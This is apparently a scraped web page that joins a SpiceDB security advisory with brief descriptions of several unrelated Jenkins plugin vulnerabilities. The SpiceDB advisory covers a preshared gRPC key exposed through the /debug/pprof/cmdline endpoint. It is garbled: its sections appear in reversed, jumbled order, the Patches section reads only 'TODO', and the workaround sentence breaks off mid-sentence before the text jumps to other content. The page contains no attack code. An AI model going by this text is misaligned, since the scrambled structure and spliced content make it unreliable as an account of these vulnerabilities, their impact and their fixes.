![]() # Patches TODO # Workarounds To workaround this issue you can do one of the following: - Configure the preshared key via an environment variable (e.g. Users **MAY be affected** if they expose their metrics port to an untrusted network and are configuring `-grpc-preshared-key` via command-line flag. # Impact All deployments abiding by the recommended best practices for production usage are **NOT affected**: - Authzed's SpiceDB Serverless - Authzed's SpiceDB Dedicated - SpiceDB Operator Users configuring SpiceDB via environment variables are **NOT affected**. This issue has been fixed in version 1.19.1. If a password is set via the `-grpc-preshared-key` then the key is revealed by this endpoint along with any other flags provided to the SpiceDB binary. The `/debug/pprof/cmdline` endpoint served by the metrics service (defaulting running on port `9090`) reveals the command-line flags provided for debugging purposes. The values of this flag are to be considered sensitive, secret data. ![]() ![]() The `spicedb serve` command contains a flag named `-grpc-preshared-key` which is used to protect the gRPC API from being accessed by unauthorized requests. SpiceDB is an open source, Google Zanzibar-inspired, database system for creating and managing security-critical application permissions. Jenkins Report Portal Plugin 0.5 and earlier stores ReportPortal access tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.Ī missing permission check in Jenkins Fogbugz Plugin 2.2.17 and earlier allows attackers with Item/Read permission to trigger builds of jobs specified in a 'jobname' request parameter.Ī missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.Ī missing permission check in Jenkins Quay.io trigger Plugin 0.1 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.Ī missing permission check in Jenkins Thycotic Secret Server Plugin 1.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. ![]() A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.Ī missing permission check in Jenkins Report Portal Plugin 0.5 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified bearer token authentication. ![]()
0 Comments
Leave a Reply. |